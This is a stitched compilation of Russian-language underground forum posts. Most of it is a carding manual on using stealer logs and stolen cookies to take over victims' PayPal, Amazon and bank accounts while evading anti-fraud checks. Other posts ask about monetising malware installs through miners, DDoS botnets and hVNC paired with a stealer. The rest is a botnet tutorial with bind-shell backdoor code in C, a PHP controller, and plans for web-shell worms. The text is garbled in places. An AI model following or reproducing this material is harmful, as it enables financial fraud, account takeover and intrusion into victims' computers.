даже не догадывается и продолжает пользоваться пк как обычно. И если лог
старый, у него окажутся более свежие кукисы при заходе на собственный акк,чем
у вас. Что вызовет подозрение антифрауд системы.Разумно же? Ну и я уж не
говорю о том,что юзер мог прервать сессию и изменить пароль от тех акков,что
вы решите хакнуть.
Далее, получив пробник мы удоставерились что лог свежий,что стиллер названный
селлером соответствует обещанному ( Легко узнаем по структуре папок и
файлов,хранившихся в архиве - пример лога Азора).
Теперь проверим лог на предмет источника инсталов. Большинство людей не знает
об этом важном моменте. Включая самих селлеров.
Если наш стиллер имеет настройки форм-грабберов в функционале ( например Азор)
и передает нам файлы и скрины рабочего стола - детально проверяем их на
наличие кряков,патчей,активаторов. Если вы их обнаружите, возможно трафер лил
с инстал куба ( Центр монитизации файлового трафика). Качество таких инсталов
оставляет желать лучшего и к работе я не рекомендую.
Хорошими же считаются инсталы,например добытые с бирж.
И так. С возрастом,стиллером и инсталами нашего малыша разобрались. Вы купили
лог.
Теперь,после покупки,первым делом проверяем содержимое наших файлов и наличие
кукисов. Если вы,предположим,приобретаете у селлера лог под выборку (с азора
такой лог стоит в районе 10-20 долларов,в зависимости от запроса) ,например
пейпал, следует сначала проверить файл Password-list.
Читать все от начала до конца не обязательно (хотя и не вредно), благодаря простой комбинации поиска в блокноте (Ctrl+f) вводим запрос "paypal".
Нас автоматом перекинет на нужную строчку в документе. Если запрос
отсутствует, смело требуйте от селлера замены. Можно конечно забить на это
дело и попытаться подобрать пароль из имеющихся (чаще всего юезры используют
2-3 постоянных пароля) либо восстановить через мыло - но зачем,если можно
попросить замену?) . Если с логин+пас все ок - идем в папку,где хранятся наши
кукисы. Открываем блокнот,проделывая туже простецкую комбинацию с поиском.
Если в логе будут присутствовать строчки искомого запроса,значит кукисы есть.
Однако, если увидите значение False, это означает что сервером был получен
отрицательный ответ при коннекте. В палку зайти не смогли. Например кх забыл
пас и этот неудачный коннект - единственное воспоминание о нас,хранимое в
сервере палки. Формально, селлер в праве отказаться от замены,т.к куки есть,но
попробуйте договориться. Авось и войдет в положение.
Если все вышеперечисленные условия соблюдены - перейдем наконец к настройке
системы.
3. Система и Ip
Собственно,я встречал много разных мнений относительно того,как подстроить айпи и с чего лучше бить. Вероятно, определенно-верного решения здесь нет. Кто-то берет айпи под штат,кто-то под зип. А кто-то бьет с впн под русским айпи (Знаю таких людей лично). Я все же советую ориентироваться на ваш запрос. Если вы решили работать по не самым известным шопам юсы - чистого айпишника без блэков и портов,под штат холдера будет достаточно. Однако я советую брать долгоживущие туны, ибо процесс отслеживания ордера может затягивать от нескольких дней до недели и вдобавок родной DNS, избавит нас от сомнительных операций с пабликом. Если вы к примеру, специализируетесь на амазоне, который в свою очередь весьма капризный и чувствительный к регистру с нового айпи адреса,за что сразу накидывает фрод баллы - лучше брать под зип холдера. Да,определенно,амаз может дать вам возможность легко вбить товар на кх,под пикап и рероут, но чаще всего прилетают алерты в течении нескольких часов,на почту кх,а аккаунт холдят и сбрасывают все транзакции. Так же, могут отменить транзу и прислать алерт через 24-36 часов после вбива, когда просто зайдешь проверить статус заказа. Вероятно,такая транзакция подвергалась проверке в ручном режиме. В общем - решайте сами,какой айпи использовать. Главное - чистота. Если VPN - Виндскрайб, ОпенВпн, Ваниш. Если соксы - Фейс.
Натянули носок/тун/впн - идем чекать наш айпишник. Обычно все советуют проверять на Whoer и Whatleaks. Скажу вам честно,ребята. Уже не первый раз видел инфу относительного того,что бд этих серверов охотно делятся данными о чек-запросах с анти-фрауд конторами и якобы,якобы - айпишники чекнутые там? вносятся в какой-то регистр. Достоверной инфы нет,возможно это просто фейк и баллады. А возможно нет. Решать вам. Я все же чекаю обычно в сфере,т.к. пользуюсь ей, либо на ip-score. Проверить хороший ваш айпи или плохой,можно так же на векторе (для тех,кто знает). Главное - добейтесь 90-100%ных показателей частоты айпи. Все порты закрыты,блэков нет,время и часовой пояс соответствуют. И удалите к хуям свой TeamViewer, серьезно
Далее, с чего серфить.
Вариантов на самом деле много,но самые ходовые 3 - Мазила,Хром,Сфера (только платная).
1. Настройка Мазилы. Качаем 54 - 56 английскую версию Лисы.
[https://ftp.mozilla.org/pub/firefox/releases/54.0/win64-EME-free/en- US/Firefox Setup 54.0.exe](https://ftp.mozilla.org/pub/firefox/releases/54.0/win64-EME-free/en- US/Firefox%20Setup%2054.0.exe)
(Я качал тут,но потом кто-то из кентов кричал что якобы ратник нашел. На всякий случай,инспектируйте. Либо качайте с паблика)
Далее,сразу после установки и запуска Мазилы,нужно отключить автообновление.
Иначе после 1ой сессии,придется все переделывать.
В адресной строке браузера набрать
about:config
и нажать Enter
Выдаст аллерт с просьбой быть аккуратным - соглашаемся.
В строке Поиск (чуть ниже адресной строки) наберите app.update. Появится такой
список. Ищем
app.update.auto — автоматическое обновление браузера
app.update.enabled — обновление браузера
Переключаем в значение false. Готово. Теперь мазила не обновится без вашего разрешения.
Далее,для работы нам понадобиться поставить 2 плагина.
https://addons.mozilla.org/en-US/firefox/addon/cookies-exportimport/?src=api
(импорт куки)
https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
(экспорт куки)
Первый плагин,для добавления кукис в браузер,второй - для выгрузки,когда вы например вобьете стаф и нужно будет сохранить более свежие куки,для последующего контроля за процессом доставки.
Ставим ограничитель Werbtc <https://addons.mozilla.org/en- US/firefox/addon/webrtc-control/>
Так же,можно поставить плагин Юзер Агента <https://addons.mozilla.org/en- US/firefox/addon/user-agent-switcher-revived/>
Так,как лог хранит информацию о браузере,с которого кх логинился на акк, можно
подстроиться под него,в юзер агенте. Нужно вам или нет? Решайте сами. Где это
не пригодится совсем,где-то поможет не набрать очков фрода, а где-то наоборот
наличие юзер агента будет спалено системой и вы привлечете к себе подозрение.
После рестарта Мазилы,открываем import cookies и импортируем файлы с куками
нашего логина ( Из папки Browser). Каждый грузим отдельно.
Когда загрузили последний - можем начинать работать.
Ставим опять же англ. версию хрома. Далее понадобится расширение - Editthiscoockie https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg ( качаем)
Ставим ограничитель Werbtc <https://chrome.google.com/webstore/detail/webrtc- network-limiter/npeicpdbkakmehahjeeohfdhnlpdklia>
Ну и User-agent,который действует аналогично лисе - <https://chrome.google.com/webstore/detail/user-agent-switcher- for-g/ffhkkpnppgnfaobgihpdblnhmmbodake>
Точно так же,как и с мазилой,импортируем поочередно наши куки в браузер.
Почему я не использую эти два варианта,несмотря на простоту и бесплатность.
Во-первых, старая версия лисы на пк юзера - для фрауд системы уже
подозрительно. Много-ли юзеров в юсе,настолько привередливы к старой версии
мазилы,что аж специально,в ручном режиме,отказываются ее обновлять? Это все-
равно что всю жизнь с одной бабой прожить,наверное. Бывает и такое конечно,но
в освою очередь вызывает любопытство и внимание. Которого нам как раз не
нужно))
Второе - это Werbtc. На паблике сложно найти годную информацию о работе
этого ~~пидора~~ товарища. Но запомните - Werbtc, один из злейших врагов
каржа,на который мы зачастую,даже не обращаем внимание. Нам кажется,что просто
отключить (палево) или подменить (палево) значение под айпи сокса/туна будет
достаточно. Но это не правда. Запомните,эта херня палит жеска. И настроить ее
должным образом,крайне тяжело. В основном, решить вопрос с этой шнягой без
должных знаний, можно лишь покупкой годных антиков, вот собственно таких как
Сфера,о которой пойдет речь ниже.
P.S Если вы все же понимаете важность вышеописанного,как вариант - использование домашних дедиков и VNC. Загрузить Мазилу или хром на них и проделать тоже самое,исключив только плагины с Werbtc. Родные значения от дедика и собственный айпи будут лучшим вариантом. Однако,если нужен айпи под зип,найти такой дедик будет делом не легким.
3) Сфера
По настройке сферы писать особо нужды нет. Качать там ничего не надо,куки грузятся кнопкой в менюшке import cookies , в настройках сессии ( жмем правой кнопкой мыши) . На сайте есть подробный разбор и настройка в интерактивном режиме. Мне лучше не написать, один хрен)
В общем-то ребята,скажу сразу - Сфера на мой взгляд,лучший и удобнейший браузер для работы с логами ( не сочтите за рекламу,но антик сделан на совесть). И да - он платный. Один месяц стандартной версии сферы стоит 100$. Есть более расширенная версия,насколько я помню 500$ за пол года. Почему не бесплатный кряк? Кряк говно.Поверьте на слово.Чем хороша сфера? Первое - мультирежимность. Можно иметь 8 сессий с разными логами и легко переключаться между ними,используя под каждый лог собственный айпи и настройки железа. Удобно и быстро. Второе - грамотно настроенная Werbtc, что очень важно. Вы не спалитесь перед каждым 2ым шопом. А так же настроенная WebGL и шрифты,особенно Canvas. Отлаженная работа DNS ( многие думают что взять днс с паблика и вбить в настройках адаптера будет достаточно,лол) . Так же базовые возможности настройки конфигураций системы под холдера. В вип версии даже режим автоматора ( Автопрогрев браузером шопов. Не нужно бегать по ссылкам самому,выставил таймер и брауз прогрев шоп за тебя). В общем плюсов очень много и вещь полезная. Для тех,кому налкадно тратить 100 баксов,можно начать с пробной версии. Семь дней за 30$.
4. Рекомендации по вбивам.
Расписывать,как грамотно работать с каждым шопом и банком в этом мануале я не буду. Каждый шоп,каждый банк,палка и даже разные email домены нужно обрабатывать по своему. Детально, все эти вопросы я буду рассматривать в рамках своего развернутого обучения по работе с логами,который я как раз планирую запустить в ближайшее время. Даты начала обучения,детали и ценник, если захотите,сможете уточнить у меня лично)
Но некоторые рекомендации по работе озвучу.
В первую очередь, начиная работать с логом должно убедиться в порядочности селлера и в том,что продан лог в одни руки. Как это сделать? Достаточно просто. Если акк уже кто-то чекал до вас,вы вероятно заметите следы,оставленные кардером. Например, неоплаченные товары в корзине,либо стаф номиналами от 500-900 баксов (то,что доступно под рероут и пикап),либо гифты (email digital code) - различные ключи к играм,psn и xbox code,т.к многие кардеры пытаются урвать с лога сразу, надеясь на инстант выплаты. Либо,проверив список коннектов с разных айпи адресов,на мыле, нажав на "дополнительная информация", в правом нижнем углу. Как тут на скрине
Если айпи только ваш и кх,значит кроме вас его никто не юзал. Ну и так же проверяйте папку удаленные сообщения и даты алертов от различных шопов.
Когда удостоверились,что лог только ваш - первым делом проверяйте доступ к почте. Даже не имея кукисов или паролей,имея только доступ к мылу и слегка покопавшись в кейген файлах,можно получить доступ к многим шопам. Например, тот же Амазон хоть и имеет весьма капризную систему,но может быть легко восстановлен с мыла холдера. При запросе на восстановление пароля и вводе проверочного кода,Амазон прибегает к дополнительной мере защиты - контрольный вопрос. К счастью,вопросы тупы и примитивны,а ответ почти всегда можно найти в логе. Например, просит указать зип код холдера,который без труда можно найти или в логе,или определить по пробиву айпи адреса,либо банально пройдясь по другим шопам,где есть информация о биллинг адресе. Или номер телефон,с поиском которого алгоритм схож. День рождения холдера,полные имя и фамилия, номер карты и т.д - все это без труда можно найти.
P.S Подсказка которую я вам дам. Не пытайтесь вбить амаз после восстановления. Но можно найти дочерние шопы,с прикрученным мерчем амазона,что даст вам возможность вбить стаф даже после холда акка,используя картон привязанный к амазу,но не потревожив при этом сам амазон. В такой истории,амаз сам по себе не будет никак влиять на отмены
Так же с банками,которые требуют обычно для востонавления ssn номер и номер кредитки. Имея на руках лог и всю информацию - вы практически и есть кх,с теми же знаниями,что есть в его собственной голове. Для особо стойких, можно даже соц.сети излазать и добыть инфу там.
P.S Лол,как то раз,я решил развлечься со страничкой какой-то чернокожей сучки. Как оказалось,у нее был снежок любовничек,а муж как водится - олень. Здоровенного вида негрило, видать не раз отбывший и наверняка,с огромной черной битой,о чем снежок мог бы узнать впоследствии) Собственно я списался с ним,с левой странички и слил переписку его жены с любовничком,собрав голубков в заранее оговоренное время у них дома,со странички телки. За что Негроид,любезно предоставил мне данные картонки своей шкурятни,в качестве благодарности и лишнего способа наказать неверную,чем я немедленно и с благодарностью воспользовался. Денег там было не много,но свою копейку я поимел. Как и + к карме,с диким ором от всей этой истории)))) - Это я к чему? Ах да. Заработать тут можно на чем угодно).
Так же, настоятельно не советую вам жадничать и бить кучу всего подрят. Даже если вскрыли кучу шопов,везде есть привязки карт и тд - не жлобтесь. Шопов много,но кредиток и ба меньше. Банки заподозрят кучу подозрительных транзакций и захолдят разом все. В итоге вы останетесь с голой жопой. Помните - вы кх. Вы не бежите в один день покупать 100500 ноутов,гопро, 10 айфонов Х и лям гифтов для своего игрового магазина. Вы кх - вы копите на сраненький,не самый лучший ноут неделями,а то и месяцами. Привередливо выбираете товар,экономите на доставке и не гонитесь за кучей доп услуг и наворотов. Деньги кх - ваши деньги. А вы знаете точно что такое "экономить", бля буду ))))
Так же,работая по юсе,рекомендую узнать предварительно, какой доставкой шоп отправляет стаф на адрес кх. Ибо успешный вбив не гарантирует вам,что ваш пак будет отправлен почтой,пригодной для рероута ( Желательно Федя). Или что кх живет в зоне,доступной для пикапа. Зайти то стаф зайдет - но вот доедет ли он до скупа? Еще вопрос. Хотя некоторые ребята умудряются даже ебей юсы вбить на посреда и отправить в ру. Лично таких знаю.
Покупайте логи количеством от 20 штук. Да,возможно это дорого. Но. Если вы покупаете по 3-5 акков,вы просто не сможете ничего понять. Если не войдет,в памяти у вас сохранится только отрицательный опыт и вы будете ссать покупать мат дальше. А если войдет - при следующих проебах,будете думать что вам просто один раз повезло. И путем таких колебаний и экономии,в реале вы потратите денег еще больше,а результат будет хуже. Берите приемлемое количество,исходя из которого можно составить более менее адекватные статистические данные. Логи в этом похожи на брутт - работать нужно количеством,особенно начинающему. Не бойтесь экспериментировать.
Не отчаивайтесь,если ваши первые попытки провалились. Иногда приходиться перепробовать много раз,прежде чем поймешь,что тебе все это время пихали говномат и ты наконец нашел нормального селлера. Или твой метод вбива не канает.
Чекайте логи быстро,не давайте им стареть. 1-3 дня. Не больше. Кто успел - тот и сьел.
Если не знаете,что делать с акком, помните о том,что его можно продать. Есть БА с балансом,но вы не знаете как его слить? Не губите мат. Напишите на форуме и попробуйте продать. Как минимум окупите покупку лога с лихвой.
Для начинающих советую набивать руку на более старых логах и отработке.
Ковыряйте их. Увидите разные способы обхода.Потом будет проще со свежаком.
Отдельно изучите способы работы под каждый шоп,с брутт аков. Этот опыт будет
плюсом.
Ну и напоследок. Найдите себе наставника. Хороший ментор - одно из основополагающих факторов достижения успехов,в нашем деле. Мало кто способен копаться сутками в даркнетах, душно добывая инфу. Но всегда есть люди, кто уже прошел ваш путь еще в 2015 году и ему не западло поделиться)
На этом пожалуй все. Статью писал в ускоренном режиме,дабы успеть к конкурсу. Получилось сжато, но надеюсь достаточно информативно. Храни вас Бог, от деклайнов и лохов!
Учитывая то что поднялся вопрос в соседней ветке: 2 видеокурса по дорвеям. Оба довольно устаревшие, но для понимания, для начинающих, хватит
[Дорвеи на WP для новичков (2017 год)](https://mega.nz/#!Ak5iiapT!m359gW9cF- _e_oFKdNJgeXNlQxbGQwhaAcsnZOkPWZc)
Вопрос в шапке. Интересно не чек на валид mail:pass, а только валидность мыл,
под спам необходимо.
На платниках уж в большую копейку влетает пару ккк чекнуть.
Благодарю за советы
Привет!
Ребята, вообщем суть, есть целая кучу установок, но континент мягко говоря не
платежёспособен.
По себестоимости выходит 30-40$ - 1к инсталлов.
У меня есть такие варианты:
1.Майнер , но х#й его знает, актуален ли он сейчас вообще, насколько я знаю,
боты отлитают быстро и отбивать в монеро даже 30$ я наверное год буду или я не
прав?
2.ДДос ботнет построить, но конкуренция огромная, интересно, он кому то нужен
сейчас?
3. Скачивание каких то дополнений (как раньше амиго был), но не знаю, где
такую ПП найти.
Что вы скажите на счёт моих идей.
За лучший ответ, переведу незамедлительно 0.03 btc (350$), участнику данного
форума.
сабж в шапке темы, где и как? Легально, проверяют ли внутренний контент сайта модераторы перед апрувом заявки рекламы?
Как всё это работает? Скрипт с помощью Shodan ищет Chromecasts устройства, конектится к ним и запускает твой ролик.
Для этого понадобится API ключик для Shodan, компуктер с Python3 и прямые ручки.
2. Запускаешь скриптик, вставляешь ключик от Shodan (61TvA2dNwxNxmWziZxKzR5aO9tFD00Nj) и id твоего ролика на Youtube.
Если вообще ничего не понятно, есть пара мануалов о работе в Shodan
Мануал по установке и настройке API - https://shodan.readthedocs.io/en/latest/
Мануал по работе с Shodan - <https://the- eye.eu/public/Books/qt.vidyagam.es/library/zz_unsorted/shodan.pdf>
Instagram
Для накрутки нам понадобится сайты:
[CLIKE]https://iglive.me/home#[/CLIKE]
https://igtools.ooo/views - крутит медленнее не много
Заходим, вставляем ссылку на видео, ждем около минуты, накручивается 7,000 просмотров приблизительно.
Запускается счетчик в 30сек, и повторно вставляем ссылку. Таким образом можно накрутить просмотров хоть на миллион.
Пользуемся пока не прикрыли.
НУЖЕН ЧЕЛОВЕК с нормальным поисковым , баннерным или каким либо похожим
траффиком , бизнес трафик, крипто тематика. Для поднятия hvnc. Ленды и все что
нужно есть. Крипт свой, хвнц тоже свой в связке со стилером. Можно подгружать
майнер. По всем вопросам л.с. или по контактам телега и жаба. Всегда на связи.
БУДУ РАД ВСЕМ предложениям.
Вобщем есть 2 десятка админок, с суточным заходом 50к.
Есть стилер, есть фуд. Как конвертнуть траф в инсталы при открытии сайтов? Как
я понимаю хром блочит файлы каторые непопулярны для скачки.
думаю людям будет интресно почитать подобную статью, потому как я ничего здесь ненашел похожего
[ + ]-------------------------------------------------[ + ]
http://hellknights.void.ru/
Зомби-Коммандование
/* все о принципах построения, работы ботнетов /
/ и их управлении */
Автор: 1nf3ct0r(1nf3ct0r@mail.ru)
[ + ]-------------------------------------------------[ + ][Зомби-Коммандование]
Думаю, ты не раз задумывался о такой идеи как поднятие своего собственного
Или в конце концов ты уже добился поставленных выше целей. Как бы это ни было, тебя это заинтересовало и ты не просто так докопался до этой статьи. Чтож, сейчас я постараюсь рассказать все тоноксти построения зомби-сетей.
Приступим.
[Основные понятия]Возможно, статью читают люди, совершенно не понимающие о чем идет речь. У новичка сразу возникнет ряд вопросов:
- Что такое ботнет? Зачем это нужно? Какая от этого прибыль? Как это примерно работает?
Вопросов будет достаточно много, чтобы разобраться с ними дочитывай статью доконца, а пока разберемся с поставленными.
Итак, ботнет - ничто иное, как сеть из зараженных компьютеров при помощи трояна или червя, которыми управляют хакеры, или как
часто их еще называют, - ботмастеры. Каждая такая зараженная тачка называется ботом или зомби. Все эти машины объединяются в
единую сеть - ботнет. Основной целью ботмастеров в перспективе ботнетов является полное управление зараженными компьюетрами, а также для проведения распределенных атак на отказ в обслуживании, рассылки спама, хостинга на ботах для сайтов с запрещенным контентом и т.д.Насколько тебе должно быть известно, рассыл спама - очень выгодный метод заработка в сети и тебе, наверное, ни раз приходили письма с предложениями увеличить какие-то части тела, купить таблетки для похудения и прочее, прочее. Одним из самых частых целей использования ботнета является заработок на распределенных атаках на отказ в обслуживании (DDoS, англ. Distributed Denial of Service) - атака, возникшая от своего младшего брата - DoS (Denial of
Service - отказ в обслуживании), успешным результатом атаки которой является зависание сервера или отдельного демона.
В качестве метода атаки выступает банальный флудинг определенными пакетами, зависищими от методов DoS'a, которых существует
достаточно большое множество. Если подумать логически над выражением "распределенная атака в обслуживании", то можно сразу
(ну или не сразу) понять, что DDoS - усовершеннствованная как в качестве эффективности, так и в масштабности, атака.
Объясню подробнее. Главным отличием DoS'a от DDoS'a является то, что в первом случае флудинг идет лишь с одной машины, как
правило это какой-нибудь шелл или выделенныый сервер (DS/VDS) с широченным интернет-каналом, зафлудить с которого, например,
простого диалапщика - раз плюнуть, а во-втором случае - флудинг идет сразу со всей зомби-сети! Причем количество ботов
зависит от стараний и мастерства хакера - их может быть сотни, тысячи или даже миллионы! Довольно непросто представить себе
как будет вести себя атакованная машина ICMP-пакетами с двух/трех тысяч ботов, но ясно одно: компьютер уйдет в нокдаун.
Почему так происходит? Принцип таких атак достаточно прост: сервер получает пакет, система его обрабатывает, затем,
приходит следующий - и становится "в очередь", итак очень долго - занимаются ресурсы системы, а севрак попросту
"перегружается", оставляя желать лучшего: либо просто зависания, либо отключения от сети. Далее мы рассмотрим с тобой
некоторые методы флуда для того, чтобы ты выбрал тот, что тебе нужен. Также существует такая интересная идея, как хостинг
на ботах. Зачем это нужно? Допустим ты, не имея ботнета решил, что тебе нуженн хост под фишинг/спам/дроп-проекты и прочее,
но этого мало. Нужна стойкая, "антиабузная" система, ведь после своих, мягко говоря, нехороших действия от пользователей
полетят жалобы к хостеру, которые как раз принято называть абузами, а хостинги, которые забивают на такие абузы -
"абузоустойчивые" хостинги. Как правило, при таком ботнет-хостинге, боты со скудным каналом отсейваются и остаются лишь
"качественные". Безусловно, ботов можно использовать, например, для каких- нибудь распределительных вычислений - здесь список
будет тянуться долго: от каких-либо сложных математических вычислений до взлома зашифрованных паролей алгоритмом MD5
(кстати, правильнее говорить хэшированных в случае с MD5) или подбора пароля к RAR-архиву. Распределенную сеть можно
использовать в той же науке, практически повсеместно, главное - это продумать и создать такую сеть.[Методы управления и реализации]
На самом деле, существует не так уж и много методов управления. Я имею ввиду методов, а не реализаций. Давай разберемся, что
к чему. Наверное, следует начать с самого простого метода управления и, как принято думать, неудобного. Но я постараюсь
опровергунть данное мнение. Речь идет о архитектуре "Клиент <-> Сервер".+-------------------------+
| Клиент <-> Сервер |
+-------------------------+Любой программист, пишущий программы для работы с сетью знает ее "на зубок", не говоря уже о вирусмэйкерах. Если тебе хоть раз приходилось писать систему удаленного администратирования (с англ. Remote Administrative System или сокр. RAT) или попросту говоря, троян, то ты уже знаком с ней. Такая система довольно-таки проста. Есть две программы, одна называется клиентом, другая - сервером, первая устанавливается на компьютер A, а вторая на B. Как правило, сервер держит открытый порт который слушается сервером. С помощью клиентской части мы подключаемся к серверной и пользуемся ее возможнстями. Ну, вот тебе
пример: существует FTP-сервер ftp.botneta.net. С помощью чего ты к нему подключишься? Да, вот именно - с помощью программы,
которую принято называть клиентом. Твой браузер также является клиентом (HTTP), так как взаимодействует с HTTP-сервером и
т.д. Так вот, почему бы не написать программу, которая бы заставила слушать на заданном порту командный интерпретатор windows
(обычно - cmd.exe)? Достаточно прителнетиться к серверной части и у тебя имеется полный доступ к компьютеру. Такие трояны принято называть бэкдорами (backdoors - с англ. потайная дверь). Казалось бы, очень громоздкая и неудобная система для управления ботнетом: придется коннектиться к каждой машине отдельно, назначать ей задание и при том, что IP-адрес машины может постоянно меняться! Также надо будет знать каждую зараженную машину, что называется "в лицо". Да, полностью согласен, неудобно. В качестве клиента для обычного bind-шелл бэкдора может выступать простой telnet, или даже php- скрипт. Написание последнего - сущий пустяк, зато очень удобно и анонимно! Для начала сделаем форму нашего скрипта: там мы будем вводить команды и при необходимости менять IP-адресс или порт для подключения к бэкдору.А теперь примимся за работу с сокетами в PHP.
{$reply} EOF; } else { fputs ($fp, $_POST['cmd']); echo<<
За открытие сокета в php отвечает функция fsockopen(), а за передачу и получение – функции fputs() и fgets(). На сколько
тебе ясно, данные из формы будут передавать скрипту POST-запросом. Для закрытия сокета юзаем функцию fclose(), все достаточно
просто:Команда "{$_POST['cmd']}" принята сервером успешно… EOF; } fclose ($fp); } ?> Основы работы с сокетами на PHP - больше ничего. На самом-то деле не одними сокетами ограничивается посылка данных на сервер,
помимо сокетов существует еще такая прекрасная вещь как wininet, но PHP- скриптов это, на сколько я знаю, не касается.
Bind-шелл бэкдор тоже написать очень просто! Для этого также нужно уметь
работать с WinSock2 API. В наши задачи входит написание бэкдора, который запустит cmd.exe с перенаправлением ввода/вывода
на сокет клиента. Для этого сначало надо инициализируем WinSock2:BOOL WINAPI StartWinsock(){
WSADATA wsaData; // инфа о библиотеки будет храниться тут
WSAStartup(MAKEWORD(2,2), &wsaData); // инициализируем винсок
return 0;Для того, чтобы прекратить работу с WinSockets достаточно добавить функцию WSACleanup. То есть WSAStartup – начинает, WSACleanup – заканчивает. Затем нам понадобится создать сам сокет. Делается это также предельно просто (SOCKET s) :
s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
А затем заполняем все необходимые данные о сокете:
localaddr.sin_addr.s_addr = htonl(INADDR_ANY); // ожидаем соединение на любом сетевом интерфейсе
localaddr.sin_family = AF_INET; // интернет протокол
localaddr.sin_port = htons(31337); // выставили порт 31337Следующий шаг - связать сетевой адрес с сокетом (bind) и поставить на прослушку порт (listen), не забудь в самом начале
функции вписать struct sockaddr_in localaddr, clientaddr;:bind(s, (struct sockaddr *)&localaddr, sizeof(localaddr));
listen(s, 0);Ну и наконец listen. s – хэнд сокета, 0 – бэклог. Бэклог – это параметр, указывающий на размер очереди ожидающих подключений
клиентов. Например, если ты выставил в качестве параметра 10, то при подкдючении 10 клиентов в один момент сервер поставит
их в очередь, а одиннадцатый получит ошибку WSAECONNREFUSED. Если ты выставишь значение бэклога на SOMAXCONN, то "включится"
поддержка максимальной очереди ожидания.Чтобы првязать к нему cmd.exe достаточно воспользоваться функцией CreateProcess() c хэндлами сокета, но может возникнуть проблема с вводом и выводом. На сколько ты, наверное, знаешь, существуют 3 хэндла ввода-вывода:
STDIN – стандартный ввод.
STDOUT – стандартный вывод.
STDERR – вывод сообщений об ошибках.
Начнем.Сейчас мы создадим пайпы, предварительно заполнив его сруктуру (Security Attributes):
для начала добавь следующую лабуду:(PIPE InPut, OutPut;
typedef struct {HANDLE hRead; HANDLE hWrite;} PIPE
SECURITY_ATTRIBUTES Sa;А теперь заполняем Security Attributes:
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = TRUE;
sa.lpSecurityDescriptor = NULL;// создаем...
CreatePipe(&input.hRead, &input.hWrite, &sa, 0);
CreatePipe(&output.hRead, &output.hWrite, &sa, 0);Теперь заполним структуру ST для нашей функции CreateProcess(), которая запустит cmd.exe и бэкдор готов.
Опять так, сначало объяви, что st - это стартапинфо: STARTUPINFO si;ZeroMemory(&si, sizeof(STARTUPINFO));
st.cb = sizeof(STARTUPINFO);
st.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
st.wShowWindow = SW_SPOILER; // параметр SW_SPOILER сделает окно с cmd.exe невидимым (видимое - SW_SHOW)
st.hStdInput = input.hRead; // STDIN
st.hStdOutput = output.hWrite; // STDOUT
st.hStdError = output.hWrite; // перенаправляем вывод ошибок// Объявим PROCESS_INFORMATION pr;
CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &ST, PR); // запускаем CMD.exe с перенаправлением
//ввода/вывода.
}Не забудь создать бесконечный цикл, не то будет облом, короче, ты вкурил
Блуждает мнение, что поднять свою зомби-сеть под *nix-like системами, как правило на взломанных серверах, хотя бы с минимальными привилегями (nobody, apache, www и т.д) нереально! Это мнение - полнейший абсурд. Вполне реально построить
ботнет на шеллах. Для начала тебе нужен скрипт, с помощью которого ты бы смог управлять шеллами. Для тех, кто в
танке - шелл - это доступ к командному интерпретатору с какими либо привилегиями, как правило, на unix-тачке. Причем тебе не надо забэкдоривать каждую систему - достаточно залить вэб шелл, через который ты бы смог выполнять команды.
Итак, ты достал себе туеву хучу шеллов. Теперь тебе нужен скрипт, который разошлет всем шеллам
команду, благодаря которой будет будет производиться HTTP-флуд при помощи GET-запросов заданное количество времени и другими
параметрами (кстати, технологию HTTP-флуда можно с довольно-таки неплохим результатом применять для накрутки-траффика).
И не надо никаких троянов . Этот метод я сам использовал на практике - работает отлично, очень быстро и просто. Поэтому
как все это замутить - подумай сам, а я пока хочу поюзать данную фишку .
Даже сам PHP-шелл писать самому не обязательно.
Достать сами шеллы очень просто. Есть несколько вариантов: первый заключается в
покупке шеллов "оптом" - в огромном количестве. Но продавцы очень часто бывают нечестными - продают один и тот же шелл по
несколько раз, то есть твои шеллы будут постоянно
удалять. Тебе это надо? Вот и я думаю, что нет. Есть один выход: добывать шеллы самому. Согласен, что вручную добывать каждый
- ужасный гемор, но кто сказал, что это делается вручную? Итак, первое, что тебе понадобится - это знание каких-либо языков
программирования. Я предлогаю для нашей задачи один из следующих языков: PHP, Perl и C. А также умение использовать
уязвимости в вэб-скриптах, обычно это PHP. Суть
такова: пишется скрипт-червь на (допустим) perl, который с помощью поисковой системы Google будет искать уязвимый скрипт,
с помощью которого есть вомозжность выполнять команды на сервере - нам подойдут уязвимости класса PHP-include() и
PHP-injection. С помощью специально составленного google-запроса твой червь отыскивает уязвимые скрипты и заливает шеллы,
затем, после каждого удачно залитого шелла он записывает урл шелла в лог- файл. Звучит заманчиво, правда? Но и тут возникают
некоторые проблемы. Во-первых, это знание языка, во-вторых - знание команд unix, в третьих - те самые необходимые навыки
взлома, ну и в четвертых - умение работать с google - правильно составлять запросы . То есть "начинающим хакерам" еще
придется нихило попотеть, чтобы создать такую сеть.
Также нужен бажный скрипт, который бы
широко использовался в качестве вэб-движка. Если ты найдешь движок с php- инклуд багом, который установлен примерно на 100
серверах, то ты счастличик. За пару часов червь справится с работой и вернет тебе все шеллы.
Именно по такому принципу работали google-черви вроде Santy и его модификации, которые были написаны на perl'e (кстати,
исходники Santy.A, Santy.B, Santy.C, скрипт для управления вэб-шеллами и много других полезных вещей ты найдешь в архиве со
статьей), в качестве уязвимости использовал php-injection баг в форумном движке phpBB 2.0.10. Так как форум был (и есть) очень популярным, то червяк произвел очень много успешных взломов. Единственное, что обидно - он просто дефейсил сайты... Бесполезно, правда? Так вот, хватит теории, давай углубимся в суть
проблемы и решим ее вместе (вступай и компилируй ). Итак, для начала нам надо составить с тобой запрос, который мы скормим
поисковой системе. Вообще, кто не в курсе - существует метод взлома (или культ, не знаю как сказать), который так и
называется - Google-Hacking. Суть заключается в том, что с помощью граммотно составленного google-запроса можно найти
уязвимые скрипты, дампы баз данных с кредитками, пароли от ICQ-номеров и т.д. На данную тему написано огромное количество
статей и мануалов, но самым центральным ресурсом является http://johny.ihackstuff.com/, содержащий в себе туеву хучу
готовых запросов. При наличии n'ого количества денег ты можешь даже прикупить там целую книгу с эксклюзивными запросами. И
все же я поведаю тебе немного о синтаксисе google.
Допустим, тебе понадобилось найти скрипт под названием botnet.php. Так как подобных скриптов очень много, то желательно
сделать более подробный запрос. Например, заголовок (который находится в тегах</title) имеет вид: "Botnet Center".
